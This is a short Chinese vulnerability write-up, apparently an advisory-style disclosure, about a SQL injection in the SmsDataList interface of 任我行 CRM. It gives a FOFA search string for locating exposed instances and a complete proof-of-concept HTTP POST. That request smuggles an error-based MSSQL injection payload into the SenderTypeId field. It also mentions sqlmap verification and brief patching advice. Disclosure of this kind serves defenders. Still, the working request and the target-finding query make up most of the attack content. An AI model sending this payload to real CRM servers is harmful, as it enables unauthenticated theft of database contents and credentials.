任我行 CRM SQL注入漏洞复现（HW0day）

0x01 产品简介

    任我行CRM（Customer Relationship Management）是一款专业的企业级CRM软件，旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。

0x02 漏洞概述

   任我行 CRM SmsDataList 接口处存在SQL注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。

0x03 复现环境

FOFA："欢迎使用任我行CRM"

0x04 漏洞复现

PoC

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ipKeywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI

 

sqlmap验证 

 0x05 修复建议

临时缓解方案

限制访问来源地址，如非必要，不要将系统开放在互联网上。

升级修复方案

升级至安全版本或打补丁！